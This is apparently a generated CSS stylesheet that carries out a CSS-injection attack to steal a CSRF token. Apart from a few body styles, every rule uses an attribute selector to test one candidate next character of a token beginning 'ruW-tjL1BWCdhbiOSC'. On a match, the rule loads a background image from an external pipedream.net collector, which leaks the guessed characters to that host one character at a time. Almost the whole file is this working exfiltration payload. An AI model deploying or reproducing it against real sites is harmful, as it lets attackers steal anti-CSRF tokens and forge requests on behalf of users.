html, body {
    width: 100%;
    margin: 0;
    padding: 0;
    color: #eeeeee;
    background: #232323;
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC0']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+48);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC1']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+49);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC2']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+50);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC3']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+51);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC4']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+52);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC5']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+53);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC6']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+54);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC7']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+55);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC8']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+56);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC9']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+57);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCa']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+97);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCb']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+98);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCc']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+99);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCd']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+100);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCe']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+101);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCf']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+102);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCg']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+103);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCh']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+104);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCi']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+105);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCj']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+106);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCk']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+107);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCl']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+108);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCm']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+109);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCn']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+110);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCo']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+111);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCp']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+112);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCq']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+113);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCr']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+114);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCs']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+115);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCt']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+116);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCu']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+117);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCv']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+118);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCw']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+119);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCx']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+120);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCy']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+121);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCz']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+122);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCA']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+65);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCB']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+66);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCC']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+67);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCD']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+68);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCE']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+69);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCF']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+70);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCG']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+71);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCH']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+72);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCI']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+73);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCJ']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+74);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCK']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+75);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCL']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+76);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCM']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+77);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCN']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+78);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCO']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+79);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCP']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+80);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCQ']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+81);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCR']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+82);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCS']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+83);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCT']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+84);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCU']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+85);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCV']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+86);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCW']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+87);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCX']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+88);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCY']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+89);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSCZ']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+90);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC!']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+33);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC#']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+35);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC$']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+36);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC%']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+37);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC&']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+38);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC"']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+34);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC(']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+40);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC)']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+41);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC*']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+42);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC+']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+43);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC,']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+44);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC-']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+45);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC.']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+46);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC/']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+47);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC:']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+58);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC;']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+59);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC<']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+60);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC=']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+61);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC>']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+62);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC?']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+63);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC@']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+64);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC[']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+91);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC]']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+93);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC^']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+94);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC_']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+95);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC`']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+96);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC{']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+123);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC|']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+124);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC}']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+125);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC~']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+126);
}

input.csrf[value^='ruW-tjL1BWCdhbiOSC ']{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/+114+117+87+45+116+106+76+49+66+87+67+100+104+98+105+79+83+67+32);
}

